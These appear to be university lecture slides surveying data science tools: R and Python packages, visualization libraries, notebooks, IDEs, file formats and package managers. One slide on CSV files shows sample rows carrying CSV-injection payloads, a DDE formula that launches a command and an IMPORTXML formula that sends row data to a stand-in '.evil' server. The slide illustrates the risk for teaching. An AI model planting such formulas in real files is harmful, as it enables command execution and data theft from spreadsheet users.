Advanced Analytics in Business [D0S07a] Big Data Platforms & Technologies [D0S06a] Data Science Tools Overview

In-memory analytics
Python and R
More on visualization
The road to big data
Notebooks and development environments
A word on file formats
A word on packaging and versioning systems

2 In-memory analytics

3 The landscape is incredibly complex

4 Heard about Hadoop? Spark? H2O?

Many vendors with their "big data and analytics" stack

Vendors: Amazon, Cloudera, Datameer, DataStax, Dell, Oracle, IBM, MapR, Pentaho, Databricks, Microsoft, Hortonworks, EMC2
There's always "roll your own"
Open source, or walled garden?
Support?
What's up to date?
Which features?

5 Two sides emerge

Infrastructure

"Big Data" "Integration" "Architecture" "Streaming"

6 Two sides emerge

Analytics

"Data Science" "Machine Learning" "AI"

7 There's a difference

8 In-memory analytics

Your data set fits in memory: the assumption of many tools (SAS, SPSS, MATLAB, R, Python, Julia)
Is this really a problem?
Servers with 512GB of RAM have become relatively cheap: cheaper than an HDFS cluster
Implementation makes a difference (representation of the data set in memory)
If your task is unsupervised or supervised modeling, you can apply sampling
Some algorithms can work in online / batch mode (see the sketch below)
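As an illustration of the last point, here is a minimal sketch (Python, scikit-learn, made-up random data) of online / mini-batch learning: the model only ever sees one chunk at a time, so the full data set never has to fit in memory.

import numpy as np
from sklearn.linear_model import SGDClassifier

clf = SGDClassifier()                        # linear model trained with stochastic gradient descent
classes = np.array([0, 1])                   # all classes must be declared on the first partial_fit call
for _ in range(100):                         # pretend each chunk is streamed from disk
    X_chunk = np.random.rand(1000, 5)
    y_chunk = (X_chunk[:, 0] > 0.5).astype(int)
    clf.partial_fit(X_chunk, y_chunk, classes=classes)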

9 Python and R

10 The big two

The "big two" in modern data science: Python and R Both have their advantages Others are interesting too (e.g. Julia), but less adopted Not (really) due to the language itself Thanks to their huge ecosystem: many packages for data science available Vendors such as SAS and SPSS remain as well But bleeding-edge algorithms or techniques found in open-source first

11 Analytics with R

Native concept of a "data frame": a table in which each column contains measurements on one variable, and each row contains one case
Unlike an array, the data you store in the columns of a data frame can be of various types: one column might be a numeric variable, another might be a factor, and a third might be a character variable
All columns have to be the same length (contain the same number of data items), although some of those data items may be missing values

12 Analytics with R

Standard data frames are not very efficient

data.table : fast aggregation of large data (e.g. 100GB in RAM), fast ordered joins, fast add/modify/delete of columns by group using no copies at all, list columns, a fast friendly file reader

DT[i, j, by]   # Subset rows using `i`, then calculate `j`, grouped by `by`
##   R:   i       j                by
## SQL:   where   select | update  group by

# How can we get the average arrival and departure delay
# for each (orig, dest) pair and each month
# for carrier code "AA"?

ans <- flights[carrier == "AA",
               .(m_arr = mean(arr_delay), m_dep = mean(dep_delay)),
               by = .(origin, dest, month)]

#      origin dest month     m_arr      m_dep
#   1:    JFK  LAX     1  6.590361 14.2289157
#   2:    LGA  PBI     1 -7.758621  0.3103448
#  ...
# 200:    JFK  DCA    10 16.483871 15.5161290

13 Analytics with R

R is great thanks to its ecosystem

Hadley Wickham: Chief Scientist at RStudio, and an Adjunct Professor of Statistics at the University of Auckland, Stanford University, and Rice University

Data Science

ggplot2 for visualising data

dplyr for manipulating data

tidyr for tidying data

stringr for working with strings

lubridate for working with date/times

https://www.tidyverse.org/

Data Import

readr for reading .csv and fwf files

readxl for reading .xls and .xlsx files

haven for SAS, SPSS, and Stata files (also: "foreign" package)

httr for talking to web APIs

rvest for scraping websites

xml2 for importing XML files

Concept of "tidy" data and operations 14 Analytics with R

head(arrange(select(flights, year, month, day), desc(year)))

Can also be written as

flights %>%
  select(year, month, day) %>%
  arrange(desc(year)) %>%
  head

Similar to Unix pipe operator

Great way to fluently express data wrangling operations

Note: dplyr can even connect to relational databases and will convert data operations to SQL

One way to solve the big data issue!

15 Analytics with R

delay <- flights %>%
  group_by(tailnum) %>%
  summarise(count = n(),
            dist = mean(distance, na.rm = TRUE),
            delay = mean(arr_delay, na.rm = TRUE))

delay %>%
  filter(count > 20, dist < 2000) %>%
  ggplot(aes(dist, delay)) +
    geom_point(aes(size = count), alpha = 1/2) +
    geom_smooth() +
    scale_size_area()

Also see: https://www.rstudio.com/resources/cheatsheets/

16 Analytics with R

Modeling in R

Virtually any unsupervised or supervised algorithm is implemented in R as a package

The caret package (short for Classification And REgression Training) is a set of functions that attempt to streamline the process of creating predictive models
The package contains tools for: data splitting, pre-processing, feature selection, model tuning using resampling, and variable importance estimation
(caret depends on other packages to do the actual modeling, and wraps these to offer a unified interface)
You can just use the original package as well if you know what you want

17 Analytics with R

require(caret)
require(ggplot2)
require(randomForest)

training <- read.csv("train.csv", na.strings = c("NA", ""))
test <- read.csv("test.csv", na.strings = c("NA", ""))

# Invoke caret with random forest and 5-fold cross-validation
rf_model <- train(TARGET ~ ., data = training, method = "rf",
                  trControl = trainControl(method = "cv", number = 5),
                  ntree = 500)  # Other parameters can be passed here

print(rf_model)
## Random Forest
##
## 5889 samples
##   53 predictors
##    5 classes: 'A', 'B', 'C', 'D', 'E'
##
## No pre-processing
## Resampling: Cross-Validated (5 fold)
##
## Summary of sample sizes: 4711, 4712, 4710, 4711, 4712
##
## Resampling results across tuning parameters:
##
##   mtry  Accuracy  Kappa  Accuracy SD  Kappa SD
##    2    1         1      0.006        0.008
##   27    1         1      0.005        0.006
##   53    1         1      0.006        0.007
##
## Accuracy was used to select the optimal model using the largest value.
## The final value used for the model was mtry = 27.

18 Analytics with R

print(rf_model$finalModel)
##
## Call:
##  randomForest(x = x, y = y, mtry = param$mtry, proximity = TRUE,
##               allowParallel = TRUE)
##                Type of random forest: classification
##                      Number of trees: 500
## No. of variables tried at each split: 27
##
##         OOB estimate of error rate: 0.88%
## Confusion matrix:
##      A    B    C   D    E class.error
## A 1674    0    0   0    0     0.00000
## B   11 1119    9   1    0     0.01842
## C    0   11 1015   1    0     0.01168
## D    0    2   10 952    1     0.01347
## E    0    1    0   5 1077     0.00554

19 Analytics with R

The mlr package is an alternative to caret

R does not define a standardized interface for all its machine learning algorithms
Therefore, for any non-trivial experiment, you need to write lengthy, tedious and error-prone wrappers to call the different algorithms and unify their respective outputs
Additionally, you need to implement infrastructure to resample your models, optimize hyperparameters, select features, cope with pre- and post-processing of data, and compare models in a statistically meaningful way
The mlr package provides this infrastructure so that you can focus on your experiments
The framework provides supervised methods like classification, regression and survival analysis along with their corresponding evaluation and optimization methods, as well as unsupervised methods like clustering
It is written in a way that you can extend it yourself or deviate from the implemented convenience methods and construct your own complex experiments or algorithms
The package is nicely connected to OpenML, an online platform which aims at supporting collaborative machine learning and allows you to easily share datasets as well as machine learning tasks, algorithms and experiments in order to support reproducible research

Newer, though gaining uptake

20 Analytics with R

The modelr package provides functions that help you create elegant pipelines when modelling

More recent, by Hadley Wickham
Mainly for simple regression models for now

More information: http://r4ds.had.co.nz/

Modern R approach
Starts simple: linear and visual models
Great introduction!

21 Visualizations with R

ggplot2 reigns supreme
By Hadley Wickham
Uses a "grammar of graphics" approach
A grammar of graphics is a tool that enables us to concisely describe the components of a graphic
An abstraction which makes thinking about, reasoning about, and communicating graphics easier
Such a grammar allows us to move beyond named graphics (e.g., the "scatterplot") and gain insight into the deep structure that underlies statistical graphics
Original idea: Wilkinson (2006)

ggvis : based on ggplot2 and built on top of Vega (a visualization grammar: a declarative format for creating, saving, and sharing interactive visualization designs)
Also declaratively describes data graphics
Different render targets
Interactivity: interact in browser, on phone, ...
http://ggvis.rstudio.com/

22 Visualizations with R

shiny : a web application framework for R

Construct interactive dashboards

23 Other packages worth noting

Apart from those mentioned elsewhere...

janitor : tools for cleaning data

foreign : read in SAS data

stringr : work with text

lubridate : work with times and dates

ROCR : make ROC and other curves (or verification , or pROC , or mltools )

MICE : handle missing data (or naniar )

ROSE : up/down sampling with SMOTE

forecast : time series analysis (or prophet )

leaflet : make maps

igraph : social network analysis

esquisse : drag and drop ggplot2 plot builder (Tableau-style)

assertr : assertions on data

24 Analytics with Python

Python itself is not a statistical / scientific language

SciPy is a Python-based ecosystem of open-source software for mathematics, science, and engineering

NumPy is the fundamental package for scientific computing with Python A powerful N-dimensional array object, sophisticated (broadcasting) functions, tools for integrating C/C++ and Fortran code, useful linear algebra, … “Let’s make Python’s arrays fast”

pandas is an open source, BSD-licensed library providing high-performance, easy-to-use data structures and data analysis tools for the Python programming language
Python's "data frame", built on NumPy

matplotlib : comprehensive 2D plotting
SciPy library: fundamental library for scientific computing

25 Analytics with Python

import pandas as pd
import numpy as np

df = pd.DataFrame(np.random.randn(6, 4),
                  index=pd.date_range('20130101', periods=6),
                  columns=list('ABCD'))

df.sort_values(by='B')

                   A         B         C         D
2013-01-03 -0.861849 -2.104569 -0.494929  1.071804
2013-01-04  0.721555 -0.706771 -1.039575  0.271860
2013-01-01  0.469112 -0.282863 -1.509059 -1.135632
2013-01-02  1.212112 -0.173215  0.119209 -1.044236
2013-01-06 -0.673690  0.113648 -1.478427  0.524988
2013-01-05 -0.424972  0.567020  0.276232 -1.087401

26 Analytics with Python

NumPy itself is clean and very well documented...

Pandas' API is a bit of a mess

"Minimally Sufficient Pandas": https://medium.com/dunder-data/minimally-sufficient-pandas- a8e67f2a2428

E.g. on the different ways to index:

.loc is primarily label based ( dataframe.loc['a'] ), but may also be used with a boolean array; .loc will raise a KeyError when the items are not found
.iloc is primarily integer position based (from 0 to length-1 of the axis)
.ix supported mixed integer and label based access (now deprecated)
Similarly to .loc, .at provides label based scalar lookups, while .iat provides integer based lookups analogously to .iloc

Oh, and you can still do dataframe.a or dataframe['a']

If df is a sufficiently long DataFrame, then df[1:2] gives the second row, however, df[1] gives an error and df[[1]] gives the second column
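A minimal sketch contrasting these access methods on a toy data frame (column and index names made up for illustration):

import pandas as pd

df = pd.DataFrame({'a': [10, 20, 30], 'b': [1.0, 2.0, 3.0]},
                  index=['x', 'y', 'z'])

df.loc['y']       # label based: the row labelled 'y'
df.iloc[1]        # position based: the second row
df.at['y', 'a']   # scalar lookup by label
df.iat[1, 0]      # scalar lookup by position
df['a']           # column 'a'
df.a              # the same column, via attribute access
df[1:2]           # positional slice of rows: the second row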

There are packages like dplython and pandas-ply , though not widely used

27 Analytics with Python

Modeling offers a better picture

scikit-learn is uncontested in the Python ecosystem
Simple and efficient tools for data mining and data analysis
Accessible to everybody, and reusable in various contexts
Built on NumPy, SciPy, and matplotlib
Open source, commercially usable (BSD license)
Lots of algorithms implemented

statsmodels: a Python library that provides classes and functions for the estimation of many different statistical models, as well as for conducting statistical tests and statistical data exploration
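A minimal sketch of what statsmodels looks like in practice, fitting an ordinary least squares regression on made-up data:

import numpy as np
import pandas as pd
import statsmodels.api as sm

np.random.seed(0)
x = np.random.normal(size=100)
y = 2.0 * x + 1.0 + np.random.normal(scale=0.5, size=100)   # toy linear relationship plus noise

X = sm.add_constant(pd.DataFrame({'x': x}))                 # add an intercept column
model = sm.OLS(y, X).fit()
print(model.summary())                                      # coefficients, confidence intervals, R-squared, tests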

28 Analytics with Python

from sklearn.datasets import load_iris
from sklearn.ensemble import RandomForestClassifier
import pandas as pd
import numpy as np

iris = load_iris()
df = pd.DataFrame(iris.data, columns=iris.feature_names)
df['is_train'] = np.random.uniform(0, 1, len(df)) <= .75
df['species'] = pd.Categorical.from_codes(iris.target, iris.target_names)

train, test = df[df['is_train'] == True], df[df['is_train'] == False]

features = df.columns[:4]
clf = RandomForestClassifier(n_jobs=2)
y, _ = pd.factorize(train['species'])
clf.fit(train[features], y)

preds = iris.target_names[clf.predict(test[features])]
pd.crosstab(test['species'], preds, rownames=['actual'], colnames=['preds'])

29 Analytics with Python

For some things you'll have to look elsewhere

"scikit-learn tries to provide a unified API for the basic tasks in machine learning, with pipelines and meta-algorithms like grid search to tie everything together"
The concepts, APIs, algorithms and expertise required for structured learning are different from what scikit-learn has to offer
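A minimal sketch of that unified API: a preprocessing + model pipeline tuned with grid search (dataset and parameter grid chosen purely for illustration):

from sklearn.datasets import load_iris
from sklearn.pipeline import Pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import GridSearchCV

X, y = load_iris(return_X_y=True)
pipe = Pipeline([('scale', StandardScaler()),
                 ('clf', LogisticRegression(max_iter=1000))])
grid = GridSearchCV(pipe, {'clf__C': [0.1, 1.0, 10.0]}, cv=5)   # tune the model's C over 5 folds
grid.fit(X, y)
print(grid.best_params_, grid.best_score_)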

pystruct handles general structured learning

seqlearn handles sequences only

surprise for recommender engines

statsmodels for time series
Deep learning and reinforcement learning both require a rich vocabulary to define an architecture, with deep learning additionally requiring GPUs for efficient computing; neither of these fit within the design constraints of scikit-learn
Basic CPU-based artificial neural networks are present, however
Good support for working with textual data, though: many featurization options

30 Visualizations with Python

matplotlib : the foundation

seaborn : “If matplotlib ‘tries to make easy things easy and hard things possible,’ seaborn tries to make a well-defined set of hard things easy too”
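A minimal sketch of the kind of one-liner seaborn makes easy (using the 'tips' example dataset that ships with seaborn):

import seaborn as sns
import matplotlib.pyplot as plt

tips = sns.load_dataset('tips')                                # small example dataset bundled with seaborn
sns.lmplot(x='total_bill', y='tip', hue='smoker', data=tips)   # scatter plot plus a regression fit per group
plt.show()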

Others:

ggplot : Python implementation of ggplot2. Not a “feature-for-feature port of ggplot2,” but there’s strong feature overlap

Altair : newer library with “pleasant API”

bokeh : another interesting library

Nice comparison at: https://dansaber.wordpress.com/2016/10/02/a-dramatic-tour-through-pythons-data-visualization-landscape-including-ggplot-and-altair/

31 Other packages worth noting

Apart from those mentioned elsewhere...

imbalanced-learn : up/down sampling with SMOTE

plotnine : another ggplot -style Python plotting tool

tqdm : human friendly progress bars

yellowbrick : general purpose ML visualizations

missingno : handle missing data

dateparser : handling dates in various formats

pyflux : time series analysis (or prophet , or tsfresh )

great_expectations : assertions on data

folium : mapping library

And there are interops packages to work between R and Python as well

32 More on visualization

33 Packaged software and BI

Apart from the libraries mentioned above, there is also packaged ("business intelligence") software

E.g. Tableau, Spotfire, PowerBI, Cognos, Qlikview, SAS Visual Analytics, ...
Just "use" the tool: no hassle of coding and debugging
Ease of use
Limited in functionality
Custom design more difficult
Has nothing to do with modeling

34 Packaged software and BI

Although niche visualization can require niche tools

E.g. process mining (Disco and friends)
Web analytics (Google, Adobe, SAS)
Graph visualizations: Gephi, NodeXL, sigma.js
Mapping (Leaflet, Folium, others)

35 Further libraries to be aware of

d3.js : a JavaScript library which made famous the concept of "data-driven documents"
D3 allows you to bind arbitrary data to a Document Object Model (DOM), and then apply data-driven transformations to the document
For example, you can use D3 to generate an HTML table from an array of numbers, or use the same data to create an interactive SVG bar chart with smooth transitions and interaction
Direct coupling between data and visualization: changing the data changes the visualization
See: https://github.com/mbostock/d3/wiki/Gallery, http://bl.ocks.org/, http://bl.ocks.org/mbostock and https://bost.ocks.org/mike/

Graphviz: diagram and graph visualizations (serves as the "engine" in many other tools)

Plotly: widely used charting library, with Plotly Dash (https://plot.ly/products/dash/) as a great dashboarding tool for Python (great shiny alternative)

36 The road to big data

37 On-GPU analytics, deep learning

Ecosystem mainly based on Python (R, Java, Lua too, though less so)
Keras, TensorFlow, PyTorch as the current leaders, with dozens of other libraries: Caffe 2, Torch, Chainer, mxnet, CNTK, ...
Hardware support mainly based on NVIDIA GPUs with the CUDA SDK
Mainly Linux (but Windows support is getting better)

Training data can be very large (a million images, for instance), but not (commonly) stored or used in distributed fashion

"Epoch“: one iteration of training. For small data sets: exposing a learning algorithm to the entire set of training data (the “batch”) "Minibatch" means that the gradient is calculated across a sample before updating weights Can be done in-memory Computation can be distributed: often involves distribution over multiple GPUs, though somewhat separate approaches than Hadoop and friends, e.g. Apache mxnet – and often comes with bottlenecks when used in a networked fashion (distributed often happens by using multiple GPU’s in one machine)

38 On-disk analytics

Even if your data set exceeds the boundaries of memory, there might be an easier way around it than a full distributed setup: the "intermediate" step before going full "big data"

Use a database and SQL (see the sketch after this list)
Memory-mapped files (i.e. "disk-scratching")

ff or bigmemory in R (but not that fun)

disk.frame : a great new package! (https://github.com/xiaodaigh/disk.frame)

Dask in Python: similar API as pandas
Pandas on Ray (https://ray.readthedocs.io/en/latest/pandas_on_ray.html) is also popular, powerful when combined with modin (https://github.com/modin-project/modin) ("Modin is a DataFrame designed for datasets from 1KB to 1TB+")

vaex (https://github.com/vaexio/vaex): works with huge tabular data, processes more than a billion rows/second
Dato (Turi) used to have a great implementation, open sourced as SFrame (https://github.com/turi-code/SFrame) and in https://github.com/apple/turicreate, also worth checking out
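For the first option, a minimal sketch in Python (table and column names are hypothetical): the database does the aggregation on disk, and only the small result comes back into memory.

import sqlite3
import pandas as pd

con = sqlite3.connect('flights.db')                   # assumed on-disk SQLite database
query = """
    SELECT origin, dest, AVG(arr_delay) AS m_arr
    FROM flights
    WHERE carrier = 'AA'
    GROUP BY origin, dest
"""
summary = pd.read_sql_query(query, con)               # only the aggregated result is loaded into memory
con.close()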

39 On-disk analytics

# pandas: single file, in memory
import pandas as pd
df = pd.read_csv('2015-01-01.csv')
df.groupby(df.user_id).value.mean()

# dask: many files, lazy, out-of-core
import dask.dataframe as dd
df = dd.read_csv('2015-*-*.csv')
df.groupby(df.user_id).value.mean().compute()

import graphlab
import graphlab.aggregate as agg

sf = graphlab.SFrame.read_csv('2018-01-01.csv')
sf.groupby(key_columns='user_id', operations={'avg': agg.MEAN('value')})

Careful with this, though. You can end up with Pandas, Dask and Spark code in one spaghetti bowl. Guess how I found that out...

Nevertheless, most organizations that jumped on the Spark and co. bandwagon would have been better off taking a good look at the above

It could have been solved with a bunch of servers and a (distributed) on-disk library Funny how most of these libraries have adopted the directed acyclic graph (DAG) computing approach initially "rediscovered" by Spark as a way to forego MapReduce, something we'll talk about later

"Pandas is crashing because I'm trying to work with a 50GB data set" is not an excuse any more 40 Notebooks and development environments

41 Notebooks

Scientific programing in data science is very much concerned with exploration, experimentation, making demos, collaborating, and sharing results

It is this need for experiments, explorations, and collaborations that is addressed by notebooks for scientific computing Notebooks are collaborative web-based environments for data exploration and visualization Similar to a “lab notebook”

The idea of computer notebooks has been around for a long time, starting with the early days of MatLAB and Mathematica in the mid-to-late-80s.

Later: SageMath and IPython Today: Jupyter, Beaker, Zeppelin

42 Notebooks

43 Notebooks

The Sage Notebook was released on 24 February 2005 by William Stein

Professor of mathematics at the University of Washington
Free and open source software (GNU license), with the initial goal of creating an "open source alternative to Magma, Maple, Mathematica, and MATLAB"
Sage is based on Python and focuses on mathematical worksheets
Today: not widely used, outdated

44 Notebooks

The IPython console was started by Fernando Perez circa 2001

From a first attempt to replicate a Mathematica Notebook with 259 lines of code
With the Sage Notebook being a reference, Fernando Perez had many collaborations with the Sage team

45 Notebooks

In 2015, the IPython Notebook project became the Jupyter project

The foundation for a generation of scientific publications focused on reproducibility, by making the data and the code accessible and open
The ability to go beyond Python and run several languages in a notebook is also at the center of the Jupyter rebirth
Multilingualism is still limited, however: it is not possible to have multiple cells with multiple languages within the same notebook; furthermore, in order to run notebooks in languages other than Python, you still need to install additional "kernels"
A kernel provides programming language support in Jupyter; IPython is the default kernel
Additional kernels include R, Julia, and many more
Impressive success and steady growth since 2011
In the past year, the number of ipynb files on GitHub has nearly tripled

46 Notebooks

47 Notebooks

Other alternatives:

Apache Zeppelin: similar in concept to Jupyter
Apache Zeppelin is built on the JVM while Jupyter is built on Python
Zeppelin offers the possibility to mix languages across cells; it currently supports Scala (with Apache Spark), Python (with Apache Spark), SparkSQL, Hive, Markdown and Shell
Zeppelin is fully oriented towards Spark: data exploration and visualization intended for big data and large-scale projects. Of course you can use pyspark in a Jupyter Notebook, but Zeppelin is natively Spark
See also: "Spark Notebook": http://spark-notebook.io/ (less used)
Was originally promoted as the way forward by many Spark-based vendor stacks, though today Jupyter is the most popular environment, so most stacks include, or have moved to, Jupyter
Beaker: designed from the start to be a fully polyglot notebook; it currently supports Python, Python3, R, Julia, JavaScript, SQL, Java, Clojure, HTML5, Node.js, C++, LaTeX, Ruby, Scala, Groovy, Kdb
Nice idea of mixing languages in the same notebook, but has not really gone anywhere
nteract: for those of you that like to have Jupyter installed as a desktop app; includes easier ways for styling

48 Notebooks

Jupyter comes with a lot of benefits

Quick iteration, immediate output shown in the notebook
Easy to construct "dynamic" reports, applying style sheets
You can even make them interactive (i.e. through the use of widgets; see the sketch below)
Many extensions to adjust your workflow
"JupyterHub" to host a multi-user Jupyter environment
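A minimal sketch of such an interactive widget (assuming the ipywidgets package is installed; to be run inside a notebook cell):

from ipywidgets import interact

def preview(n=5):
    return list(range(n))          # placeholder for e.g. df.head(n)

interact(preview, n=(1, 20))       # renders a slider; re-runs preview() on every change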

49 Notebooks

But come with a set of issues as well...

Version control can be problematic: Jupyter stores notebooks as one big JSON file, including inputs and outputs; every time you make a change, you need to commit the whole file
Code can only be run block-by-block (cell by cell)
Can easily mess up the flow of code (non-linear execution): you end up with a notebook which has newer results above older results
Code can end up looking fragmented: people start splitting the chunks and forget to put them back together, lose track of the order of the analysis, and it all ends up in a big mess
Does not encourage writing modular code: you end up copying code fragments from older notebooks or other people's notebooks
"Executing" a notebook can be difficult: reproducibility, export to Python or R? Some notebooks offer execution possibilities

50 Notebooks

https://www.reddit.com/r/Python/comments/9aoi35/i_dont_like_notebooks_joel_grus_jupytercon_2018/
https://yihui.name/en/2018/09/notebook-war/

1. Hidden state and out-of-order execution
2. Notebooks are difficult for beginners
3. Notebooks encourage bad habits
4. Notebooks discourage modularity and testing
5. Jupyter's autocomplete, linting, and way of looking up the help are awkward
6. Notebooks encourage bad processes
7. Notebooks hinder reproducible + extensible science
8. Notebooks make it hard to copy and paste into Slack/GitHub issues
9. Errors will always halt execution
10. Notebooks make it easy to teach poorly
11. Notebooks make it hard to teach well

51 Notebooks

https://colab.research.google.com

52 Notebooks

https://studio.azureml.net/

53 Notebooks

But come with a set of issues as well...

Version control can be problematic: fixed in many hosted environments; collaboration possible as well; possible to "roll your own", e.g. through the use of "git hooks"
Code can only be run block-by-block (cell by cell): enforce strict guidelines
Does not encourage writing modular code: harder to solve; enforce guidelines, but allow people to work on this
"Executing" a notebook can be difficult: solutions exist to overcome this as well

The takeaway? Notebooks are here to stay

Great tool for exploration, experimentation, and the development phase of data science, even for showing results in "report" form
But additional processes / skills are required: modularization, using a real IDE, software development principles!
If not: "throw it over the wall" projects, where they hit the wall of deployment!

54 IDEs

Integrated development environment

Commonly offers much better debugging, code inspection, and documentation capabilities
RStudio for R: on desktop, or hosted on a web server (commercial); support for Git and others; authoring reports and slide shows; interactive visualizations
Rodeo for Python: copies the look and feel of RStudio; similar: Spyder
Or IDEs such as PyCharm
JupyterLab: builds on top of Jupyter; adds panel layout, file view; a work in progress but has fixed a lot of Jupyter's issues!

55 IDEs

https://www.rstudio.com/

56 IDEs

https://rodeo.yhat.com/

57 IDEs

https://www.jetbrains.com/pycharm/

58 IDEs

https://github.com/jupyterlab/jupyterlab

59 Getting started

Python

Anaconda Distribution: https://www.continuum.io/downloads
Includes Jupyter, Python, and a data science package repository (also for R)

R

CRAN (base installation): https://cran.r-project.org/
RStudio: https://www.rstudio.com/
Or Jupyter

Hosted ("one click Jupyter")

https://studio.azureml.net/ (free)
https://colab.research.google.com (free)
Kaggle Kernels (free)
Crestle ($0.30 an hour)
Paperspace Gradient ($0.59 an hour)
Floydhub ($1.20 an hour)
Salamander ($0.38 an hour)
SageMaker, Google Cloud Platform, EC2, DigitalOcean, ... and install yourself

60 A word on file formats

61 In which format do we store our data?

You might be used to text-based formats (CSV and friends, or Excel), but there are various concerns at play here:

How fast is it to serialize data (write)?
How fast can it be read in?
How large is it?
Column or row based?
Easy to distribute?
Easy to modify the schema?

62 Text based formats

CSV, TSV, JSON, XML
Convenient to exchange with other applications or scripts
Human readable
Bulky and not efficient to query without reading the whole structure into memory first
Hard to infer a schema
Compression applies on the file level
Still one of the most common formats

63 Text based formats

UserId,BillToDate,ProjectName,Description,DurationMinutes
1,2017-07-25,Test Project,Flipped the jibbet,60
2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240

UserId,BillToDate,ProjectName,Description,DurationMinutes
1,2017-07-25,Test Project,Flipped the jibbet,60
2,2017-07-25,Important Client,"Bop, dop, and giglip", 240
2,2017-07-25,Important Client,
"=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")", 240

http://georgemauer.net/2017/10/07/csv-injection.html

64 Text based formats

65 Sequence files

A persistent data structure for binary key-value pairs ("serialized Java objects")
Row-based
Commonly used to transfer data in MapReduce jobs (see later)
Compression applies on the row level
Less popular in recent years; not portable

66 Optimized Row Columnar (ORC)

Evolution of RCFile
Stores collections of rows, and within the collection the data is stored in columnar format (a combination of row- and column-based)
Lightweight indexing
Splittable
Less popular in recent years

67 Avro

Widely used as a serialization format
Row-based, compact binary format
Schema is included in the file
Supports schema evolution: add, rename and delete columns
Compression on the record level
https://blog.cloudera.com/blog/2009/11/avro-a-new-format-for-data-interchange/
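A minimal sketch of writing and reading Avro from Python, assuming the fastavro package (the schema and records are made up):

from fastavro import writer, reader, parse_schema

schema = parse_schema({
    'name': 'Flight', 'type': 'record',
    'fields': [{'name': 'origin', 'type': 'string'},
               {'name': 'arr_delay', 'type': 'double'}],
})
records = [{'origin': 'JFK', 'arr_delay': 6.5}, {'origin': 'LGA', 'arr_delay': -7.8}]

with open('flights.avro', 'wb') as out:
    writer(out, schema, records)          # the schema travels with the file

with open('flights.avro', 'rb') as fo:
    for rec in reader(fo):                # the schema is read back from the file itself
        print(rec)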

68 Parquet

Column-oriented binary file format
Efficient when specific columns are queried
Common in data science
Parquet is built to support very efficient compression and encoding schemes
Parquet allows compression schemes to be specified on a per-column level
Good support for schema evolution: can add columns at the end
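A minimal sketch from pandas, assuming pyarrow is installed as the Parquet engine (data made up):

import pandas as pd

df = pd.DataFrame({'origin': ['JFK', 'LGA'], 'arr_delay': [6.5, -7.8]})
df.to_parquet('flights.parquet')                                        # columnar, compressed on disk
subset = pd.read_parquet('flights.parquet', columns=['arr_delay'])      # read back only the needed column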

69 SQLite files

Row-oriented file store
Support for multiple tables, schema evolution, SQL querying
Integrates nicely with many languages
Data sets can become very large

70 HDF5

HDF5 is a data model, library, and file format for storing and managing data
Supports an unlimited variety of datatypes, and is designed for flexible and efficient I/O and for high-volume and complex data
HDF5 is portable and extensible, allowing applications to evolve in their use of HDF5
A file system within a file
The specification is very complex
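A minimal sketch using the h5py package (dataset name and shape are arbitrary):

import numpy as np
import h5py

with h5py.File('data.h5', 'w') as f:
    f.create_dataset('measurements', data=np.random.rand(1000, 10), compression='gzip')

with h5py.File('data.h5', 'r') as f:
    first_rows = f['measurements'][:5]    # slices are read from disk on demand, not the whole dataset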

71 Kudu

Kudu is a storage system for tables of structured data
Tables have a well-defined schema consisting of a predefined number of typed columns; each table has a primary key composed of one or more of its columns
Kudu tables are composed of a series of logical subsets of data, similar to partitions in relational database systems, called tablets
Kudu provides data durability and protection against hardware failure by replicating these tablets to multiple commodity hardware nodes

72 Apache Arrow

Engineers from across the community are collaborating to establish Arrow as a de-facto standard for columnar in-memory processing and interchange
Apache Arrow is an in-memory data structure specification for use by engineers building data systems
A columnar memory layout permitting O(1) random access; the layout is highly cache-efficient in analytics workloads
Not a binary file specification, but a memory representation specification
Efficient and fast data interchange between systems without the serialization costs associated with other systems like Thrift, Avro, and Protocol Buffers
A flexible structured data model supporting complex types that handles flat tables as well as real-world JSON-like data engineering workloads
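A minimal sketch of what an Arrow table looks like from Python, using the pyarrow package (data made up):

import pyarrow as pa

table = pa.Table.from_pydict({'origin': ['JFK', 'LGA', 'JFK'],
                              'arr_delay': [6.5, -7.8, 16.4]})
print(table.schema)        # typed, columnar in-memory layout
print(table.to_pandas())   # hand the same data over to pandas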

73 Feather

A Fast On-Disk Format for Data Frames for R and Python, powered by Apache Arrow

“ "One thing that struck us was that while R’s data frames and Python’s pandas data frames utilize very different internal memory representations,

they share a very similar semantic model" “

"In discussing Apache Arrow in the context of Python and R, we wanted to see if we could use the insights from Feather to design a very fast file format for storing data frames that could be used by both languages. Thus, the Feather format was born"

74 Feather

Feather is a fast, lightweight, and easy-to-use binary file format for storing data frames. It has a few specific design goals:

Lightweight, minimal API: make pushing data frames in and out of memory as simple as possible
Language agnostic: Feather files are the same whether written by Python or R code; other languages can read and write Feather files, too
High read and write performance: when possible, Feather operations should be bound by local disk performance

library(feather)
path <- "my_data.feather"
write_feather(df, path)
df <- read_feather(path)

# Analogously, in Python, we have:
import feather
path = 'my_data.feather'
feather.write_dataframe(df, path)
df = feather.read_dataframe(path)

75 Feather

"Feather is one of the first projects to bring the tangible benefits of the Arrow spec to users in the form of an efficient, language-agnostic representation of tabular data on disk. Since Arrow does not provide for a file format, we are using Google's Flatbuffers library (github.com/google/flatbuffers) to serialize column types and related metadata in a language-independent way in the file"

76 What to take away from this?

Be prepared to deal with different data sources

Avro is fast to serialize (write, dump) data and supports schema evolution: a great choice for ETL and integration
Parquet and Feather are fast to read, query, and analyse data

Future: Arrow/Feather + Parquet

Feather is not designed for long-term data storage; at this time, there is no guarantee that the file format will be stable between versions
Instead, use Feather for quickly exchanging data between Python and R code, or for short-term storage of data frames as part of some analysis
Feather is extremely fast; since Feather does not currently use any compression internally, it works best when used with solid-state drives such as those that come with most of today's laptop computers
Many organisations are adopting a hybrid approach

77 A word on packaging and versioning systems

78 Packaging

You'll commonly encounter "package managers" when working in your preferred ecosystem

"A package manager or package management system is a collection of software tools that automates the process of installing, upgrading, configuring, and removing computer programs for a computer's operating system in a consistent manner."

Clean, simple installs and updates
Avoiding conflicts
Resolving dependencies

79 Virtual environments

This is commonly combined with a way to set up "virtual environments": isolated subsystems, each with their own packages

The idea is to make your environment reproducible Avoid the "runs on my computer" syndrome

80 In Python and R

R comes with its own package management system, which allows you to download packages from a repository

E.g. install.packages(...)

Virtual environments can be set up using packrat

Python has had a lot of package managers, but the most common one nowadays is pip
